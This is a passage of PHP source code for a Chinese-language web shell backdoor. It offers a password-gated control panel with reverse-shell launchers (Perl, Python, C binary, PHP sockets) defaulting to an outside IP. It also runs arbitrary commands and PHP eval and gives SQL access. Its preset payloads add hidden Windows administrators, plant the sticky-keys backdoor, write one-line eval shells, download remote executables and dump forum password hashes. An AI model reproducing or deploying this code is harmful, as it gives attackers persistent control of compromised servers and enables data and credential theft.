	return array('res' => $res,'msg' => $msg);
}

function backshell($ip,$port,$dir,$type) {
	$key = false;
	$c_bin = '';
	switch($type) {
		case "pl" : 
		$shell = '';
		$file = strdir($dir.'/t00ls.pl');
		$key = filew($file,base64_decode($shell),'w');
		if($key) { @chmod($file,0777); command('/usr/bin/perl '.$file.' '.$ip.' '.$port,$dir); }
		break;
		case "py" : 
		$shell = '';
		$file = strdir($dir.'/t00ls.py');
		$key = filew($file,base64_decode($shell),'w');
		if($key) { @chmod($file,0777); command('/usr/bin/python '.$file.' '.$ip.' '.$port,$dir); }
		break;
		case "c" : 
		$file = strdir($dir.'/t00ls');
		$key = filew($file,base64_decode($c_bin),'wb');
		if($key) { @chmod($file,0777); command($file.' '.$ip.' '.$port,$dir); }
		break;
		case "php" : case "phpwin" : 
		if(function_exists('fsockopen')) {
			$sock = @fsockopen ($ip,$port);
			if($sock) {
				$key = true;
				$com = $type == 'phpwin' ? true : false;
				$user = get_current_user();
				$dir = strdir(getcwd());
				fputs($sock,php_uname()."\n------------no job control in this shell (tty)-------------\n[$user:$dir]# ");
				while($cmd = fread($sock,1024)) {
					if(substr($cmd,0,3) == 'cd ') { $dir = trim(substr($cmd,3,-1)); chdir(strdir($dir)); $dir = strdir(getcwd()); }
					elseif (trim(strtolower($cmd)) == 'exit') { break; }
					else { $res = command($cmd,$dir,$com); fputs($sock,$res['res']); }
					fputs($sock,'['.$user.':'.$dir.']# ');
				}
			}
			@fclose ($sock);
		}
		break;
		case "pcntl" : 
		$file = strdir($dir.'/t00ls');
		$key = filew($file,base64_decode($c_bin),'wb');
		if($key) { @chmod($file,0777); if(function_exists('pcntl_exec')) { @pcntl_exec($file,array($ip,$port)); } }
		break;
	}
	if(!$key) { $msg = '<h1></h1>'; } else { @unlink($file); $msg = '<h2>CLOSE</h2>'; }
	return $msg;
}

function getinfo() {
	global $password;
	$infos = array($_POST['getpwd'],$password,function_exists('phpinfo'));
	if($password != '' && md5($infos[0]) != $infos[1]) {
	echo '
<title></title>
<meta http-equiv="content-type" content="text/html;charset=gb2312">
<style type="text/css">
.form-control {
display: block;
width: 100%;
height: 38px;
padding: 8px 12px;
font-size: 14px;
line-height: 1.428571429;
color: #555;
vertical-align: middle;
background-color: #fff;
border: 1px solid #ccc;
border-radius: 4px;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
-webkit-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s
}

.btn {
display: inline-block;
padding: 8px 12px;
margin-bottom: 0;
font-size: 14px;
font-weight: 500;
line-height: 1.428571429;
text-align: center;
white-space: nowrap;
vertical-align: middle;
cursor: pointer;
border: 1px solid transparent;
border-radius: 4px;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
-o-user-select: none;
user-select: none
}

.btn-primary {
color: #fff;
background-color: #428bca;
border-color: #428bca
}
</style>
<center>
<br><br>
<font size="3" face="Microsoft YaHei">
360D</font>
<br><br>
<form method="POST">
<input style="Width:125pt;display:inline-block;font-family:Microsoft YaHeifont-size:90%" class="form-control" placeholder="@Passwrd" type="password" name="getpwd">
';
if(isset($_POST['pass'])) { echo '<input type="hidden" name="pass" value="'.$_POST['pass'].'">'; }
if(isset($_POST[$_POST['pass']])) { echo '<input type="hidden" name="'.$_POST['pass'].'" value="'.$_POST[$_POST['pass']].'">'; }
if(isset($_POST['check'])) { echo '<input type="hidden" name="check" value="'.$_POST['check'].'">'; }
echo '<input style="Width:55pt;font-size:90%;font-family:Microsoft YaHei" class="btn btn-primary" type="submit" value="#Login"></form></center></body></html>';
exit;
	}
	@setcookie("new",951);
	if(@$_COOKIE["new"]!=95){@setcookie("new",95);}
	return $infos[2];
}
function links(){
	$hostr = $_SERVER["HTTP_HOST"];
	$arr = file_get_contents("http://mytool.chinaz.com/baidusort.aspx?host=".$hostr);
	$arr= iconv('UTF-8','GB2312' , $arr);
	preg_match_all("/<div class=\"siteinfo\"><font color=\"blue\">[1-9]<\/font>/",$arr,$s);
	$c=$s[0][0];
	$c=str_replace("<div class=\"siteinfo\"><font color=\"blue\">","",$c);
	$c=str_replace("</font>","",$c);
	return $c;
}


function subeval() {
	if(isset($_POST['getpwd'])) { echo '<input type="hidden" name="getpwd" value="'.$_POST['getpwd'].'">'; }
	if(isset($_POST['pass'])) { echo '<input type="hidden" name="pass" value="'.$_POST['pass'].'">'; }
	if(isset($_POST[$_POST['pass']])) { echo '<input type="hidden" name="'.$_POST['pass'].'" value="'.$_POST[$_POST['pass']].'">'; }
	if(isset($_POST['check'])) { echo '<input type="hidden" name="check" value="'.$_POST['check'].'">'; }
	return true;
}

if(isset($_POST['go'])) {
	if($_POST['go'] == 'down') {
		$downfile = $fileb = strdir($_POST['godir'].'/'.$_POST['govar']);
		if(!filed($downfile)) { $msg = '<h1></h1>'; }
	}
}

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<style type="text/css">
* {margin:0px;padding:0px;}
body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Microsoft YaHei,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;}
a{color:#000000;text-decoration:none;vertical-align:middle;}
a:hover{color:#FF0000;text-decoration:underline;}
p {padding:1px;line-height:1.6em;}
h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}
h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}
form {display:inline;}
input,select { vertical-align:middle; }
input[type=text], textarea {padding:1px;font-family:Microsoft YaHei,sans-serif;}
input[type=submit], input[type=button] {height:21px;}
.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}
.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}
.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}
.main {width:963px;margin:0 auto;padding:10px;}
.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}
.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}
.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}
.msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;}
.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}
.tables {width:100%;}
.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}
.tables td {background:#F9F6F4;height:19px;padding-left:2px;}
</style>
<script type="text/javascript">
function $(ID) { return document.getElementById(ID); }
function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }
function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }
function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }
function go(a,b) { b = sd(b); $('go').value = a; $('govar').value = b; if(a == 'editor') { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } $('gofrm').submit(); } 
function nf(a,b) { re = prompt("",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } } 
function dels(a) { if(a == 'b') { var msg = ""; $('act').value = a; } else { var msg = ""; $('act').value = 'deltree'; $('var').value = a; } if(confirm(""+msg+"")) { $('frm1').submit(); } }
function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }
function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }
</script>
<title><?php echo VERSION.' - '.date('Y-m-d H:i:s N',time()).'';?></title>
</head>
<body>
<div class="main">
	<div class="outl">
	<div class="toptag"><?php echo ($_SERVER['SERVER_ADDR'] ? $_SERVER['SERVER_ADDR'] : gethostbyname($_SERVER['SERVER_NAME'])).' - '.php_uname().' - whoami('.get_current_user().') - uid('.getmyuid().') gid('.getmygid().')'; if(isset($issql)) echo ' - '.$issql.'';?></div>
<?php 
$menu = array('file' => '','scan' => '','antivirus' => '','backshell' => '','exec' => '','phpeval' => 'PHP','sql' => 'SQL','info' => '');
$go = array_key_exists($_POST['go'],$menu) ? $_POST['go'] : 'file';
$nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']).'/') : THISDIR;
echo '<div class="tag">';
foreach($menu as $key => $name) { echo '<a'.($go == $key ? ' class="current"' : '').' href="javascript:go(\''.$key.'\',\''.base64_encode($nowdir).'\');">'.$name.'</a> '; }
echo '</div>';

echo '<form name="gofrm" id="gofrm" method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="">';
echo '<input type="hidden" name="godir" id="godir" value="'.$nowdir.'">';
echo '<input type="hidden" name="govar" id="govar" value="">';
echo '</form>';

switch($_POST['go']) {

case "info" : 
if(EXISTS_PHPINFO) {
	ob_start();
	phpinfo(INFO_GENERAL);
	$out = ob_get_contents();
	ob_end_clean();
	$tmp = array();
	preg_match_all('/\<td class\=\"e\"\>.*?(Command|Configuration)+.*?\<\/td\>\<td class\=\"v\"\>(.*?)\<\/td\>/i',$out,$tmp);
	$config = $tmp[2][0];
	$phpini = $tmp[2][2] ? $tmp[2][1].' --- '.$tmp[2][2] : $tmp[2][1];
}
$infos = array(
	'' => $_SERVER['HTTP_USER_AGENT'],
	'' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '()',
	'' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '()',
	'PHP.ini' => $phpini ? $phpini : '()',
	'PHP' => php_sapi_name(),
	'PHP' => PHP_VERSION,
	'PHPPID' => getmypid(),
	'IP' => $_SERVER['REMOTE_ADDR'],
	'' => $_SERVER['HTTP_ACCEPT_LANGUAGE'],
	'Web' => $_SERVER['SERVER_PORT'],
	'Web' => $_SERVER['DOCUMENT_ROOT'],
	'Web' => $_SERVER['SCRIPT_FILENAME'],
	'WebCGI' => $_SERVER['GATEWAY_INTERFACE'],
	'WebEmail' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '()',
	'' => size(disk_total_space('.')),
	'' => size(disk_free_space('.')),
	'POST' => get_cfg_var("post_max_size"),
	'' => get_cfg_var("upload_max_filesize"),
	'' => get_cfg_var("memory_limit"),
	'' => get_cfg_var("max_execution_time").'',
	'Fsockopen' => function_exists('fsockopen') ? '' : '',
	'Socket' => function_exists('socket_close') ? '' : '',
	'Pcntl' => function_exists('pcntl_exec') ? '' : '',
	'Curl' => function_exists('curl_version') ? '' : '',
	'Zlib' => function_exists('gzclose') ? '' : '',
	'FTP' => function_exists('ftp_login') ? '' : '',
	'XML' => function_exists('xml_set_object') ? '' : '',
	'GD_Library' => function_exists('imageline') ? '' : '',
	'COM' => class_exists('COM') ? '' : '',
	'ODBC' => function_exists('odbc_close') ? '' : '',
	'IMAP' => function_exists('imap_close') ? '' : '',
	'' => get_cfg_var("safemode") ? '' : '',
	'URL' => get_cfg_var("allow_url_fopen") ? '' : '',
	'' => get_cfg_var("enable_dl") ? '' : '',
	'' => get_cfg_var("display_errors") ? '' : '',
	'' => get_cfg_var("register_globals") ? '' : '',
	'' => get_cfg_var("magic_quotes_gpc") ? '' : '',
	'PHP' => $config ? $config : '()'
);
echo '<div class="msgbox">'.$msg.'</div>';
echo '<table class="tables"><tr><th style="width:26%;"></th><th></th></tr>';
foreach($infos as $name => $var) { echo '<tr><td>'.$name.'</td><td>'.$var.'</td></tr>'; }
echo '</table>';
break;

case "exec" : 
$cmd = $win ? 'dir' : 'ls -al';
$res = array('res' => '','msg' => $msg);
$str = isset($_POST['str']) ? $_POST['str'] : 'fun';
if(isset($_POST['execcmd'])) {
	$cmd = $_POST['execcmd'];
	$cwd = $str == 'fun' ? THISDIR : 'com';
	$res = command($cmd,$cwd);
}
echo '<div class="msgbox">'.$res['msg'].'</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="exec">';
echo '<div class="actall"> <input type="text" name="execcmd" id="execcmd" value="'.htmlspecialchars($cmd).'" style="width:398px;"> ';
echo '<select name="str">';
$selects = array('fun' => 'phpfun','com' => 'wscript');
foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($var == $str ? ' selected' : '').'>'.$name.'</option>'; }
echo '</select> ';
echo '<select onchange="$(\'execcmd\').value=options[selectedIndex].value">';
echo '<option>------</option>';
echo '<option value="echo '.htmlspecialchars('"<?php phpinfo();?>"').' >> '.THISDIR.'t00ls.txt"></option>';
echo '<option value="whoami">whoami</option>';
echo '<option value="systeminfo">(Win)</option>';
echo '<option value="path">path(Win)</option>';
echo '<option value="ipconfig /all">ipconfig(Win)</option>';
echo '<option value="tasklist /svc">tasklist(Win)</option>';
echo '<option value="netstat -an">netstat -an(Win)</option>';
echo '<option value="net user">net user(Win)</option>';
echo '<option value="net config workstation">net config workstation(Win)</option>';
echo '<option value="net config server">net config server(Win)</option>';
echo '<option value="net user $ahsec ahsec /add & net localgroup administrators $ahsec /add">(Win)</option>';
echo '<option value="query user">query user(Win)</option>';
echo '<option value="copy c:windowsexplorer.exe c:windowssystem32sethc.exe & copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe">shift(Win)</option>';
echo '<option value="tftp -i ip get server.exe c:\server.exe">Ftp(Win)</option>';
echo '<option value="ps -ef">ps(Linux)</option>';
echo '<option value="ifconfig">ifconfig(Linux)</option>';
echo '<option value="cat /etc/syslog.conf">syslog.conf(Linux)</option>';
echo '<option value="cat /etc/my.cnf">my.cnf(Linux)</option>';
echo '<option value="cat /etc/hosts">hosts(Linux)</option>';
echo '<option value="cat /etc/services">services(Linux)</option>';
echo '<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Linux-</option>';
echo '</select> ';
echo '<input type="submit" style="width:50px;" value="">';
echo '</div><div class="actall"><textarea style="width:698px;height:368px;">'.htmlspecialchars($res['res']).'</textarea></div></form>';
break;

case "scan" : 
$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;
$keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';
$include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py';
$filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js';
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="scan">';
echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';
echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:500px;"></td></tr>';
echo '<tr><td></td><td><input type="text" name="keyword" value="'.htmlspecialchars($keyword).'" style="width:500px;"> ()</td></tr>';
echo '<tr><td></td><td><input type="text" name="include" value="'.htmlspecialchars($include).'" style="width:500px;"> ("|", )</td></tr>';
echo '<tr><td></td><td><input type="text" name="filters" value="'.htmlspecialchars($filters).'" style="width:500px;"> ("|", )</td></tr>';
echo '<tr><td></td><td><label><input type="radio" name="type" value="0"'.($_POST['type'] ? '' : ' checked').'></label> ';
echo '<label><input type="radio" name="type" value="1"'.($_POST['type'] ? ' checked' : '').'></label> ';
echo '<label><input type="checkbox" name="char" value="1"'.($_POST['char'] ? ' checked' : '').'></label></td></tr>';
echo '<tr><td></td><td><label><input type="radio" name="range" value="0"'.($_POST['range'] ? '' : ' checked').'>,</label> ';
echo '<label><input type="radio" name="range" value="1"'.($_POST['range'] ? ' checked' : '').'></label></td></tr>';
echo '<tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';
echo '</table></form>';
if($keyword != '') {
	flush(); ob_flush();
	echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';
	$incs = $include == '' ? false : explode('|',$include);
	$fits = $filters == '' ? false : explode('|',$filters);
	$isread = scanfile(strdir($scandir.'/'),$keyword,$incs,$fits,$_POST['type'],$_POST['char'],$_POST['range'],$nowdir);
	echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>';
}
break;

case "antivirus" : 
$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;
$typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php|.inc|.phtml');
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="antivirus">';
echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';
echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:398px;"> ()</td></tr>';
echo '<tr><td></td><td>';
$types = array('php' => '.php|.inc|.phtml','asp+aspx' => '.as|.cs|.cer','jsp' => '.jsp');
foreach($types as $key => $ex) echo '<label title="'.$ex.'"><input type="checkbox" name="types['.$key.']" value="'.$ex.'"'.($typearr[$key] == $ex ? ' checked' : '').'>'.$key.'</label> ';
echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';
echo '</table></form>';
if(count($_POST['types']) > 0) {
	$matches = array(
		'php' => array(	),
		'asp+aspx' => array(	),
		'jsp' => array()
	);
	flush();
	ob_flush();
	echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';
	$isread = antivirus(strdir($scandir.'/'),$typearr,$matches,$nowdir);
	echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>';
}
break;

case "phpeval" : 
if(isset($_POST['phpcode'])) {
	$phpcode = chop($_POST['phpcode']);
	ob_start();
	if(substr($phpcode,0,2) == '<?' && substr($phpcode,-2) == '?>') { @eval ('?>'.$phpcode.'<?php '); }
	else { @eval ($phpcode); }
	$out = ob_get_contents();
	ob_end_clean();
} else {
	$phpcode = 'phpinfo();';
	$out = '';
}
echo base64_decode('');
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="phpeval">';
echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">'.htmlspecialchars($phpcode).'</textarea></p><p>';
echo '<select onchange="$(\'phpcode\').value=options[selectedIndex].value">';
echo '<option>------</option>';
echo '<option value="echo readfile(\'C:/web/t00ls.php\');"></option>';
echo '<option value="$fp=fopen(\'C:/web/t00ls.php\',\'w\');echo fputs($fp,\'<?php eval($_POST[cmd]);?>\')?\'Success!\':\'Fail!\';fclose($fp);"></option>';
echo '<option value="echo copy(\'C:/web/t00ls1.php\',\'C:/web/t00ls2.php\')?\'Success!\':\'Fail!\';"></option>';
echo '<option value="echo chmod(\'C:/web/t00ls1.php\',0777)?\'Success!\':\'Fail!\';"></option>';
echo '<option value="echo file_put_contents(\''.THISDIR.'cmd.exe\', file_get_contents(\'http://www.baidu.com/cmd.exe\'))?\'Success!\':\'Fail!\';"></option>';
echo '<option value="print_r($_SERVER);"></option>';
echo '<option value="echo filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(115).chr(104).chr(46).chr(99).chr(111).chr(110).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(108).chr(105).chr(98).chr(47).chr(108).chr(105).chr(98).chr(115).chr(104).chr(46).chr(115).chr(111).chr(47).chr(115).chr(104).chr(100).chr(99).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100));">find rootkit</option>';
echo '</select> ';
echo '<input type="submit" style="width:80px;" value=""></p></div>';
echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">'.htmlspecialchars($out).'</textarea></p><p><input type="button" value="HTML" onclick="runcode(\'evalcode\')"></p></div>';
break;

case "sql" : 
if((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) {
	$type = $_POST['type'];
	$sqlhost = $_POST['sqlhost'];
	$sqluser = $_POST['sqluser'];
	$sqlpass = $_POST['sqlpass'];
	$sqlname = $_POST['sqlname'];
	$sqlcode = $_POST['sqlcode'];
	$names = $_POST['names'];
	switch($type) {
		case "PostgreSql" : 
		if(function_exists('pg_close')){
			if(strstr($sqlhost,':')) { $array = explode(':',$sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; }
			else { $sqlport = 5432; }
			$dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");
			if($dbconn) {
				$msg = '<h2>'.$type.' </h2>';
				pg_query('set client_encoding='.$names);
				$result = pg_query($sqlcode);
				if($result) { $msg .= '<h2> - SQL</h2>'; while($array = pg_fetch_array($result)) { $rows[] = $array; } }
				else { $msg .= '<h1> - SQL</h1>'; $rows = array('error' => pg_result_error($result)); }
				pg_free_result($result);
			} else {
				$msg = '<h1>'.$type.'</h1>';
			}
			@pg_close($dbconn);
		} else {
			$msg = '<h1>'.$type.'</h1>';
		}
		break;
		case "MsSql" : 
		if(function_exists('mssql_close')){
			$dbconn = @mssql_connect($sqlhost,$sqluser,$sqlpass);
			if($dbconn) {
				$msg = '<h2>'.$type.' </h2>';
				mssql_select_db($sqlname,$dbconn);
				$result = mssql_query($sqlcode);
				if($result) { $msg .= '<h2> - SQL</h2>'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } }
				else { $msg .= '<h1> - SQL</h1>'; }
				@mssql_free_result($result);
			} else {
				$msg = '<h1>'.$type.'</h1>';
			}
			@mssql_close($dbconn);
		} else {
			$msg = '<h1>'.$type.'</h1>';
		}
		break;
		case "Oracle" : 
		if(function_exists('oci_close')){
			$conn = @oci_connect($sqluser,$sqlpass,$sqlhost.'/'.$sqlname);
			if($conn) {
				$msg = '<h2>'.$type.' </h2>';
				$stid = oci_parse($conn,$sqlcode);
				oci_execute($stid);
				if($stid) { $msg .= '<h2> - SQL</h2>'; while (($array = oci_fetch_array($stid,OCI_ASSOC))) { $rows[] = $array; } }
				else { $msg .= '<h1> - SQL</h1>'; $e = oci_error(); $rows = array('error' => $e['message']); }
				oci_free_statement($stid);
			} else {
				$e = oci_error(); $rows = array('error' => $e['message']);
				$msg = '<h1>'.$type.'</h1>';
			}
			@oci_close($conn);
		} else {
			$msg = '<h1>'.$type.'</h1>';
		}
		break;
		case "MySql" : 
		if(function_exists('mysql_close')){
			$conn = mysql_connect(strstr($sqlhost,':') ? $sqlhost : $sqlhost.':3306',$sqluser,$sqlpass,$sqlname);
			if($conn) {
				$msg = '<h2>'.$type.' </h2>';
				if(substr($sqlcode,0,6) == 't00lsa') {
					$array = array(); $data = ''; $i = 0;
					preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i',$sqlcode,$array);
					if($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {
						mysql_select_db($array[1][0],$conn);
						mysql_query('set names '.$names,$conn);
						$spidercode = 'select '.$array[3][0].' from `'.$array[2][0].'`;';
						$result = mysql_query($spidercode,$conn);
						if($result) {
							while($row = mysql_fetch_array($result,MYSQL_ASSOC)) { $data .= join('{~}',$row)."\r\n"; $i++; }
							if($data) {
								$file = strdir($array[4][0]);
								$msg .= filew($file,$data,'w') ? '<h2> - </h2>' : '<h1> - </h1>';
								$rows = array('file' => $file,size(filesize($file)) => ''.$i.'');
							}
							else { $msg .= '<h1> - </h1>'; }
						}
						else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }
					}
					else { $msg .= '<h1> - </h1>'; }
				} elseif(!empty($sqlcode)) {
					mysql_select_db($sqlname,$conn);
					mysql_query('set names '.$names,$conn);
					$result = mysql_query($sqlcode,$conn);
					if($result) { $msg .= '<h2> - SQL</h2>'; while($array = mysql_fetch_array($result,MYSQL_ASSOC)) { $rows[] = $array; } }
					else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }
				}
				mysql_free_result($result);
			} else {
				$msg = '<h1>'.$type.'</h1>';
				$rows = array('errno' => mysql_errno(),'error' => mysql_error());
			}
			mysql_close($conn);
		} else {
			$msg = '<h1>'.$type.'</h1>';
		}
		break;
	}
} else {
	$type = 'MySql';
	$sqlhost = 'localhost:3306';
	$sqluser = 'root';
	$sqlpass = '123456';
	$sqlname = 'mysql';
	$sqlcode = 'select version();';
	$names = 'gbk';
}
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="sql">';
echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';
echo '<tr><td></td><td>';
$dbs = array('MySql','MsSql','Oracle','PostgreSql');
foreach($dbs as $dbname) { echo '<label><input type="radio" name="type" value="'.$dbname.'"'.($type == $dbname ? ' checked' : '').'>'.$dbname.'</label> '; }
echo '</td></tr><tr><td></td><td> <input type="text" name="sqlhost" style="width:188px;" value="'.$sqlhost.'"> ';
echo ' <input type="text" name="sqluser" style="width:108px;" value="'.$sqluser.'"> ';
echo ' <input type="text" name="sqlpass" style="width:108px;" value="'.$sqlpass.'"> ';
echo ' <input type="text" name="sqlname" style="width:108px;" value="'.$sqlname.'"></td></tr>';
echo '<tr><td><br>';
echo '<select onchange="$(\'sqlcode\').value=options[selectedIndex].value">';
echo '<option value="select version();">------</option>';
echo '<option value="select \'<?php eval ($_POST[cmd]);?>\' into outfile \'D:/web/shell.php\';"></option>';
echo '<option value="GRANT ALL PRIVILEGES ON *.* TO \''.$sqluser.'\'@\'%\' IDENTIFIED BY \''.$sqlpass.'\' WITH GRANT OPTION;"></option>';
echo '<option value="show variables;"></option>';
echo '<option value="create database t00ls;"></option>';
echo '<option value="create table `t00ls` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;"></option>';
echo '<option value="show databases;"></option>';
echo '<option value="show tables from `'.$sqlname.'`;"></option>';
echo '<option value="show columns from `t00ls`;"></option>';
echo '<option value="drop table `t00ls`;"></option>';
echo '<option value="select username,password,salt,email from `pre_ucenter_members` limit 0,30;"></option>';
echo '<option value="insert into `admin` (`user`,`pass`) values (\'t00ls\', \'f1a81d782dea6a19bdca383bffe68452\');"></option>';
echo '<option value="update `admin` set `user` = \'t00ls1\',`pass` = \'50de237e389600acadbeda3d6e6e0b1f\' where `user` = \'t00ls\' and `pass` = \'f1a81d782dea6a19bdca383bffe68452\' limit 1;"></option>';
echo '<option value="t00lsa \'discuzx25\' t00lsb \'pre_ucenter_members\' t00lsc \'username,password,salt,email\' t00lsfile \''.THISDIR.'out.txt\';">(MySql)</option>';
echo '</select>';
echo '</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">'.htmlspecialchars($sqlcode).'</textarea></td></tr>';
echo '<tr><td></td><td><select name="names">';
$charsets = array('gbk','utf8','big5','latin1','cp866','ujis','euckr','koi8r','koi8u');
foreach($charsets as $charset) { echo '<option value="'.$charset.'"'.($names == $charset ? ' selected' : '').'>'.$charset.'</option>'; }
echo '</select> <input type="submit" style="width:80px;" value=""></td></tr>';
echo '</table></form>';
if($rows) {
	echo '<pre style="padding:5px;background:#F8F8F8;text-align:left;">';
	ob_start();
	print_r($rows);
	$out = ob_get_contents();
	ob_end_clean();
	if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$out) && function_exists('iconv')) { $out = @iconv('UTF-8','GB2312//IGNORE',$out); }
	echo htmlspecialchars($out);
	echo '</pre>';
}
break;

case "backshell" : 
if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {
	$backip = $_POST['backip'];
	$backport = $_POST['backport'];
	$temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';
	$type = $_POST['type'];
	$msg = backshell($backip,$backport,$temp,$type);
} else {
	$backip = '222.73.219.91';
	$backport = '443';
	$temp = '/tmp';
	$type = 'pl';
}
echo '<div class="msgbox">'.$msg.'</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="backshell">';
echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';
echo '<tr><td></td><td><input type="text" name="backip" style="width:268px;" value="'.$backip.'"> (Your ip)</td></tr>';
echo '<tr><td></td><td><input type="text" name="backport" style="width:268px;" value="'.$backport.'"> (nc -vvlp '.$backport.')</td></tr>';
echo '<tr><td></td><td><input type="text" name="temp" style="width:268px;" value="'.$temp.'"> (Only Linux)</td></tr>';
echo '<tr><td></td><td>';
$types = array('pl' => 'Perl','py' => 'Python','c' => 'C-bin','pcntl' => 'Pcntl','php' => 'PHP','phpwin' => 'PHP-WS');
foreach($types as $key => $name) { echo '<label><input type="radio" name="type" value="'.$key.'"'.($key == $type ? ' checked' : '').'>'.$name.'</label> '; }
echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';
echo '</table></form>';
break;

case "edit" : case "editor" : 
$file = strdir($_POST['godir'].'/'.$_POST['govar']);
$iconv = function_exists('iconv');
if(!file_exists($file)) {
	$msg = '';
} else {
	$code = filer($file);
	$chst = '';
	if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$code) && $iconv) { $chst = 'utf-8'; $code = @iconv('UTF-8','GB2312//IGNORE',$code); }
	$size = size(filesize($file));
	$msg = ' '.substr(decoct(fileperms($file)),-4).'  '.$size.'  '.$chst.'';
}
